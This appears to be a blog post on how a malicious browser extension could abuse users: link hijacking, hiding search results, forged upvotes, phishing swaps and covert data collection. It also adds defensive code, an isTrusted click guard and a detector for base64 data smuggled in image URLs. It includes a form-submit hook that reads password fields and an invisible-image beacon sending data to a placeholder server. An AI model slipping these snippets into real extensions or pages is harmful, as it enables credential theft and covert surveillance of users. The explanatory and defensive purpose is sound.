Like what?

The extension can do what it promises, it can do it well, it can have fantastic support and reviews. This doesn’t mean it’s not doing something else behind the curtains.

Affiliate link hijacking

The author could look for links that carry an affiliate tag and swap in their own affiliate id. This leaves no trace in the Network tab, since nothing is sent to the outside world; the extension simply rewrites the URL of a link so it points to a different tag. This doesn’t hurt you, but it does hurt the person relying on the affiliate revenue. Well, I spoke too soon when I said it doesn’t hurt you… can you trust the links anymore? Can you trust the content?

Content modification, denial of action

With a few regular expressions and rules the author can write a script that hides parts of the page you are visiting if they contain a certain word. This used to be a classic in the early days of malware: you had your virus, tried searching for an answer, and your browser would close itself, or even force a reboot, if you tried doing certain tasks.

I’d consider this the browser version of that. Granted, a script isn’t allowed to close a tab with close() quite that easily, but with a little tweaking of the general behaviour of a page, say we take over all the links and open the tabs programmatically… Now we can close them if we don’t like what they’ve loaded, ain’t that just fantastic for the author.

Note that all the examples I provide are without dependencies, plain old JS, one could just as easily add a framework into their extension and do this in a fraction of the code.

About hiding parts of the content, which I find more interesting, it’s also very simple. The following snippet would hide all results in a Google search that contain the word panda, potentially guiding a help-seeking user towards other brands. You know what I’m saying.

// Hide every ad and organic result whose text mentions "panda"
document.querySelectorAll(".ads-ad,.g")
  .forEach(
    e => /panda/i.test(e.textContent)
      && (e.style.display = "none")
  );

Likes, claps, shares impersonation

The author could make people like videos/posts/comments or dislike them for that matter even without making it obvious, imagine I’m talking about Reddit. The author could hook into your upvotes and before the vote goes through, change the post id on the parent element so that you are actually upvoting something else. This can lead to a post reaching frontpage or gaining more visibility illegitimately. Hell, the author could even make you clap for this story without you realizing you did.

I never clicked the like link, an extension I wrote did for me

However, this one has a simple solution, and it’s to reject an interaction if the event doesn’t have the isTrusted flag. Read the docs. Kinda like Medium does it. Try to trigger a click event from a script on the page and it will do nothing. As far as I know, this can’t be faked; there should be no case where you need to emulate a user action from code.

If you find yourself triggering clicks programmatically to get some functionality to be executed you are doing things wrong.
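Here is what that check looks like in a page’s own click handler, as an added example that is not part of the original post. The two event objects at the bottom are constructed stand-ins for what the browser would deliver; a real page just reads the isTrusted property the browser set (events created with new MouseEvent() or dispatched via element.click() arrive with isTrusted = false, and the property is read-only).

```javascript
// Added example (not from the original post): a like/upvote handler that
// refuses synthetic clicks. Browsers set event.isTrusted = true only for
// events generated by real user input; anything a script dispatches, an
// extension's content script included, carries isTrusted = false.

// Naive handler: counts any click, including ones dispatched by a script.
function naiveLikeHandler(state, event) {
  state.likes += 1;
  return true;
}

// Hardened handler: counts only clicks the browser attributes to the user.
function trustedLikeHandler(state, event) {
  if (!event || event.isTrusted !== true) {
    // Synthetic event: ignore it (and, in a real app, consider logging it).
    return false;
  }
  state.likes += 1;
  return true;
}

// Generic wrapper so the same guard can be applied to any handler:
//   button.addEventListener("click", requireTrusted(onVote));
function requireTrusted(handler) {
  return function (event) {
    if (!event || event.isTrusted !== true) return false;
    return handler(event);
  };
}

// Constructed stand-ins for events. In a browser you never build these;
// you read the isTrusted value the browser already set on the event.
const userClick = { type: "click", isTrusted: true };
const scriptedClick = { type: "click", isTrusted: false };

// Runs the two handlers against a scripted click and returns the counts.
function demo() {
  const naive = { likes: 0 };
  const hardened = { likes: 0 };
  naiveLikeHandler(naive, scriptedClick);
  trustedLikeHandler(hardened, scriptedClick);
  return { naiveLikes: naive.likes, hardenedLikes: hardened.likes };
}
```

The check only governs what the page’s own event handlers do, so it belongs alongside server-side rate limiting and anomaly detection rather than replacing them.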

Password stealing

The author can hook into form submissions and extract your password, your login, and of course the website you are trying to access, right from under your nose. For the snippet I’m assuming a form with a specific id, but there’s literally no limit to what the extension can do.

// Really, it's that simple
var d = document;
d.querySelector("#signin_form")
  .addEventListener("submit", function (e) {
    // Read the password field just before the form is sent
    console.log(d.querySelector("input[type='password']").value);
  });

But not only that, not only your passwords to your twitter account or whatever, all the data you pass, all the data you read. When you add a credit card to Amazon? Hey, it’s me! the friendly extension, always present, always looking!

Ad replacement, phishing, etc

The author could replace advertisement from a site with their own, gaining ad revenue, replace links on legitimate websites (your bank for instance) with phishing sites, so when you go to log in you are no longer on the safe one.

Notice the replaced URL at the bottom left of the browser

Then as the phishing sites usually do, they fake a failed login attempt and redirect you back to the real site. The author then flags your device as “stolen” and it will no longer redirect you there, following visits will work seamlessly, but your credentials are compromised.

I know I’m oversimplifying this since you should have 2FA enabled on everything by now, but do you? Do all your logins require an SMS, OTP or similar?

Illegal data collection

Sending data to a random server might be too obvious and easily spotted, but the author could insert an invisible image in the DOM and pass the data through URL parameters on the source of the image.

var el = document.createElement('img');
// Setting src is enough to fire the request; the data rides in the URL
el.src = "https://myserver.com?yourdataencoded";

While this does appear in the Network tab, it doesn’t show under the XHR filter, which is the one you would expect for data going out or in, but under Images, even though the author is passing your data in that call. Of course this also means a global XHR breakpoint isn’t triggered by it.

An even more advanced technique would be to hide the extracted data within the URL while at the same time returning something of apparent value to the user, an icon, a font. It can be pushing your data out on a plain GET request.

Get an image from http://harm.less/dXNlcm5hbWU6cGFzc3dvcmQ/image.png, which is to all intents and purposes an image, regardless of the middle string being your username and password. Split the data across multiple calls, even across multiple days, from multiple pages. The extension can make its image fetch from a second tab using the shared data it gathers, take advantage of a new page loading, inject the call in there, good luck finding it in your twentieth Reddit tab.
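Added example, not from the original post: a heuristic a defender could run over a list of image URLs (say, exported from the Network tab or gathered by a monitoring extension) to spot the pattern above, a base64-looking path segment or query value that decodes to readable text. The URLs in SAMPLE_URLS are constructed for the demo; harm.less is the post’s own illustrative host.

```javascript
// Added example (not from the original post): flag image URLs that smuggle
// base64-encoded text in a path segment or query value. Heuristic only:
// cache-busting hashes and signed-URL tokens can look similar, so treat hits
// as leads to inspect, not verdicts.

function looksLikeBase64(s) {
  // Standard or URL-safe alphabet, at least 16 chars, optional padding.
  return s.length >= 16 && /^[A-Za-z0-9+/_-]+={0,2}$/.test(s);
}

// Returns the decoded string if it is mostly printable ASCII, else null.
function decodesToText(s) {
  const normalised = s.replace(/-/g, "+").replace(/_/g, "/");
  const bytes = Buffer.from(normalised, "base64"); // Node; atob() in a browser
  if (bytes.length === 0) return null;
  let printable = 0;
  for (const b of bytes) if (b >= 0x20 && b < 0x7f) printable++;
  return printable / bytes.length > 0.9 ? bytes.toString("latin1") : null;
}

// Scans each URL's path segments and query values; returns one record per hit.
function findSuspiciousImageUrls(urls) {
  const hits = [];
  for (const url of urls) {
    let u;
    try {
      u = new URL(url);
    } catch (e) {
      continue; // not a parseable absolute URL, skip it
    }
    const candidates = u.pathname.split("/").filter(Boolean);
    for (const v of u.searchParams.values()) candidates.push(v);
    for (const seg of candidates) {
      if (!looksLikeBase64(seg)) continue;
      const decoded = decodesToText(seg);
      if (decoded !== null) hits.push({ url, segment: seg, decoded });
    }
  }
  return hits;
}

// Constructed sample: two ordinary image URLs and the post's harm.less one.
const SAMPLE_URLS = [
  "https://cdn.example.net/static/logo.png",
  "http://harm.less/dXNlcm5hbWU6cGFzc3dvcmQ/image.png",
  "https://cdn.example.net/i/a1b2c3d4.png",
];
```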